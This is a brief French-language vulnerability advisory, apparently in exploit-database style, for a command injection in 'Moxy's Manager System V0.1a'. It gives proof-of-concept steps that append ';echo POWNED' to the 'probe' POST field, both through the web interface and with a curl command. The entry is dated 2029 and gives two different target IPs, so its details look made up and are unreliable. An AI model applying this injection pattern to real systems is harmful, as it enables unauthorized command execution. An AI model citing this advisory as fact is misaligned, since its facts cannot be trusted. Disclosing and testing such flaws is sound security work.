2029-3456
Verified
Captain Yolo
2029-11-11
Moxy's Manager System V0.1a - Command injection
Il est possible d'injecter des commandes shell via le champ 'probe' de la méthode POST http://10.10.10.15/index.php
Méthode 1:
Dans Update measures
- Clicker sur le boutton T
- Ajouter ;echo POWNED
- Cliquer sur Update
Méthode 2:
Dans le terminal
$ curl --data probe='T;echo POWNED' http://10.10.10.13 | grep POWNED